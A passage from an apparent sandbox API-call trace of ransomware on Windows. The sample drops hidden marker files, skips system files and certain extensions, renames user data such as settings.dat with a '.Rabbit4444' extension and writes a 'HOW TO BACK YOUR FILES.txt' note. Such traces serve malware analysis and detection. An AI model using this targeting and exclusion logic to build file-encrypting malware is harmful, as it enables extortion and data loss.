hTemplateFile=0x0) returned 0x27c [0061.872] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.874] FlushFileBuffers (hFile=0x27c) returned 1 [0061.875] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.875] CloseHandle (hObject=0x27c) returned 1 [0061.876] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings") returned 95 [0061.876] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.876] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924aecaf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3329aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0061.876] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.876] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.876] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.876] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.876] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924aecaf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3329aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.876] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.879] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.879] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.879] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.879] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.879] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3329aa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3329aa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3329aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.879] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.879] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.879] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x924aecaf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924aecaf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924aecaf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0061.879] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0061.879] lstrcpyW (in: lpString1=0x130ebf8, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0061.879] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0061.880] lstrlenW (lpString="roaming.lock") returned 12 [0061.880] lstrlenW (lpString="Rabbit4444") returned 10 [0061.880] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0061.880] lstrlenW (lpString=".dll") returned 4 [0061.880] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0061.880] lstrlenW (lpString=".lnk") returned 4 [0061.880] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0061.880] lstrlenW (lpString=".ini") returned 4 [0061.880] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0061.880] lstrlenW (lpString=".sys") returned 4 [0061.880] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0061.880] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0061.880] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0061.880] lstrcpyW (in: lpString1=0x130ebf8, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0061.880] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0061.881] lstrlenW (lpString="settings.dat") returned 12 [0061.881] lstrlenW (lpString="Rabbit4444") returned 10 [0061.881] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0061.881] lstrlenW (lpString=".dll") returned 4 [0061.881] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0061.881] lstrlenW (lpString=".lnk") returned 4 [0061.881] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0061.881] lstrlenW (lpString=".ini") returned 4 [0061.881] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0061.881] lstrlenW (lpString=".sys") returned 4 [0061.881] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0061.881] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.881] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0061.881] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15319208048) returned 1 [0061.881] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0061.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0061.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0061.882] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x29c [0061.883] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0061.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123828 [0061.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0061.885] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123828 | out: hHeap=0xe0000) returned 1 [0061.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0061.885] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123038 [0061.885] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0061.885] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123038 | out: hHeap=0xe0000) returned 1 [0061.885] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0061.885] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15319580878) returned 1 [0061.885] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0061.885] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0061.885] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.885] CloseHandle (hObject=0x29c) returned 1 [0061.885] CloseHandle (hObject=0x2a0) returned 1 [0061.885] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 119 [0061.886] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0061.887] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0061.887] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0061.887] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.887] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.888] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.888] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.889] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.889] CloseHandle (hObject=0x2a0) returned 1 [0061.889] CloseHandle (hObject=0x27c) returned 1 [0061.889] GetCurrentThreadId () returned 0xd98 [0061.889] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0061.889] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState" [0061.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116a00 | out: hHeap=0xe0000) returned 1 [0061.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0061.889] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState" [0061.889] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState\\" [0061.889] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0061.889] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.890] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.893] FlushFileBuffers (hFile=0x27c) returned 1 [0061.894] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.894] CloseHandle (hObject=0x27c) returned 1 [0061.895] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState") returned 99 [0061.895] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.895] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3588ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0061.895] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.895] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.895] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.895] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.895] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3588ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.895] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.895] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.895] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.895] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.895] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.895] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3588ec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3588ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee37eb17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.895] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.895] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.895] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3588ec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3588ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee37eb17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.895] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0061.896] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.896] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.896] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.907] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.908] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.908] CloseHandle (hObject=0x2a0) returned 1 [0061.908] CloseHandle (hObject=0x27c) returned 1 [0061.908] GetCurrentThreadId () returned 0xd98 [0061.908] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0061.908] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState" [0061.908] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116c70 | out: hHeap=0xe0000) returned 1 [0061.909] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0061.909] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState" [0061.909] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState\\" [0061.909] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0061.909] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.910] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.913] FlushFileBuffers (hFile=0x27c) returned 1 [0061.914] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.914] CloseHandle (hObject=0x27c) returned 1 [0061.914] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState") returned 97 [0061.914] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.914] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3a4ea6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0061.915] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.915] 